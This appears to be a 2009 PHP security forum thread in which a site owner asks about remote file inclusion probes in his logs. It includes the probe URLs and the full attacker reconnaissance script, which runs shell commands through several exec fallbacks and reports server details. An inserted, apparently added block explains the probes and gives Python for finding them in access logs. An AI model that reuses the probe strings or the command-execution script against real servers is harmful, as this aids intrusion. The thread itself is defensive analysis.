php injection script 'fx29id2.txt'

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


sak
Forum Newbie
Posts: 4
Joined: Sun Apr 26, 2009 9:02 am

php injection script 'fx29id2.txt'

Post by sak »

Hello guys,
As seen in my logs, someone is sending me an external PHP script in the following way:
1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??

I have opened the PHP script and basically it tests how good my server security is, I guess...
Can anyone supply further info about this script?
How do I track the sender?

By the way, this is the script:

<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }  
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { $rez = ''; while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $F; // used = total - free (original read $T - $U with $U unset)
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>
 
Last edited by Benjamin on Tue May 05, 2009 1:21 pm, edited 1 time in total.
Reason: Added code tags.
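Both request shapes in the post are register_globals-era remote file inclusion probes: a variable that the target script later feeds to include() (PHPLIB's libdir, or a $_SERVER entry) is supplied in the query string as a URL, so a vulnerable PHP install would fetch and run the remote fx29id2.txt instead of a local file. As an added example that is not from the thread, the Python below scans Apache combined-format access log lines (constructed here from the two quoted probes, with documentation-range client addresses) for query parameters whose value is a remote URL and reports the client IP, the parameter used and the host serving the payload, which is where answering "how do I track the sender" starts.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed Apache combined-format log lines (documentation-range addresses),
# modelled on the two probe requests quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Apr/2009:09:02:11 +0200] "GET /index.php?PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [26/Apr/2009:09:02:12 +0200] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [26/Apr/2009:09:05:40 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A query value that is itself a URL is the signature of a remote-include attempt.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one record per query parameter whose value points at a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlparse(m.group("target")).query
        # parse_qsl percent-decodes names, so _SERVER%5BDOCUMENT_ROOT%5D
        # comes back as _SERVER[DOCUMENT_ROOT]; blank values are kept, not dropped.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_SCHEME.match(value):
                continue
            hits.append({
                "client_ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "parameter": name,
                # Strip the trailing "??" the probe uses to push the script's appended path into a query string.
                "payload_url": value.rstrip("?"),
                "payload_host": urlparse(value).hostname,
            })
    return hits

def summarize_by_client(hits):
    """Map each probing client IP to the set of hosts it pulled payloads from."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["client_ip"], set()).add(h["payload_host"])
    return by_ip

if __name__ == "__main__":
    for h in find_rfi_probes(SAMPLE_LOG):
        print(h["timestamp"], h["client_ip"], h["parameter"], "->", h["payload_url"])
```

With register_globals=Off and allow_url_include=Off (both defaults in PHP 5.2) such a probe is logged noise rather than code execution, and the client IP and payload host are what you report to the respective abuse contacts.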
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: php injection script 'fx29id2.txt'

Post by kaisellgren »

sak wrote:
1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??
I'm not sure how he can do that. Even if you have register globals turned on, the $_SERVER shouldn't be rewritten.

The script you showed is a backdoor created by the intruder. It seems that he switched your document root server variable to his remote server's address and got access to your server.

What PHP version are you running? You should definitely turn off Register Globals and upgrade your PHP, as it seems that PHP is the one which is vulnerable here. No matter what settings I try, I cannot reproduce that kind of $_SERVER overwriting on my PHP 5.2.8.
sak
Forum Newbie
Posts: 4
Joined: Sun Apr 26, 2009 9:02 am

Re: php injection script 'fx29id2.txt'

Post by sak »

Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get any info from the company server, since it is well secured; however, I just wanted to know whether it is possible to track down the sender.
Thanks
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: php injection script 'fx29id2.txt'

Post by kaisellgren »

sak wrote:
Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get any info from the company server, since it is well secured; however, I just wanted to know whether it is possible to track down the sender.
Thanks
Well, you have his domain name; try to track him down from there..